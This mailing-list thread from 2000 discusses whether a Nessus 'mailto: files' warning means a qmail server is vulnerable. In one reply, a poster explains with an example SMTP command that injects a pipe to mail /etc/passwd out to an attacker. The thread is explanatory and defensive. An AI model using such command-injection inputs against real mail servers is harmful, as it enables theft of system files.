Re: security hole?
I think the example line in your reply triggered a virus alert. I received an email stating the reply I sent possibly contained a password stealing virus. I hope that was just triggered by your example. I don't believe I have any viruses on this machine. -- I fish therefore I lie. Bob Waskosky <[EMAIL PROTECTED]> The Perl Zone - http://www.nobhead.com/perl/ -
Re: security hole?
Bob Waskosky writes: > > rcpt to: | programname > Is this a hole and how would I plug it? It's not a hole. It's someone trying to send mail to the email address "| programname". The vertical bar is odd, yes. The space is even more unusual, yes. But a security hole? No. It would be if qmail were to interpret the | specially, as certain versions of other MTA's have in the past. But qmail is neither that naive nor trusting. -- -russ nelson <[EMAIL PROTECTED]> http://russnelson.com Crynwr sells support for free software | PGPok | "Ask not what your country 521 Pleasant Valley Rd. | +1 315 268 1925 voice | can force other people to Potsdam, NY 13676-3213 | +1 315 268 9201 FAX | do for you..." -Perry M.
Re: security hole?
On Sat, Jun 03, 2000 at 04:29:07AM +, Jim Breton wrote: > On Fri, Jun 02, 2000 at 11:17:30PM -0500, Bob Waskosky wrote: > > Is this a hole and how would I plug it? > > > No it's not a hole. It would only be a security concern if your mailer > were to allow the message to actually be piped directly to the program > specified in the "rcpt to" command. > > Say for example I were to send this command: > > rcpt to: "|mail [EMAIL PROTECTED] < /etc/passwd" > > or something similar. And your MTA happily piped my message to that > program, which also took /etc/passwd as input and mailed it to me at > [EMAIL PROTECTED] _That_ would be a problem. > > With qmail however, pipe symbols are not treated specially and don't > have the same meaning as they would in a shell. They are handled as > though they are part of a username, and since you don't have a local > user "|mail" the message is treated as any normal message to an unknown > user. > > You don't need to change anything. :) Nessus assumes that because your > mailer "accepted" the message, it will also deliver it in an "evil" > way... which qmail won't do. > kewl. Thanks for the info. -- I fish therefore I lie. Bob Waskosky <[EMAIL PROTECTED]> The Perl Zone - http://www.nobhead.com/perl/ -
Re: security hole?
On Sat, Jun 03, 2000 at 04:09:21AM +, Jim Breton wrote: > On Fri, Jun 02, 2000 at 10:58:51PM -0500, Bob Waskosky wrote: > > Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false >positive because I,m scanning myself? Any ideas how to fix this? > > > I believe Nessus (correct me if I'm wrong) is trying to send a mail > message to a program like this: > > rcpt to: | programname > > in which case qmail doesn't handle it specially, it is probably getting > picked up by your .qmail-default in ~alias (or getting bounced, if you > don't have one). > Is this a hole and how would I plug it? Thanks -- I fish therefore I lie. Bob Waskosky <[EMAIL PROTECTED]> The Perl Zone - http://www.nobhead.com/perl/ -
security hole?
Hi I scanned myself online using nessus/nmap (scanning my dynamic IP) and received an email from nessus stating: Your MTA is vulnerable to the 'mailto: files' attack. Is this a hole or a false positive because I,m scanning myself? Any ideas how to fix this? Thanks in advance Bob -- I fish therefore I lie. Bob Waskosky <[EMAIL PROTECTED]> The Perl Zone - http://www.nobhead.com/perl/ -
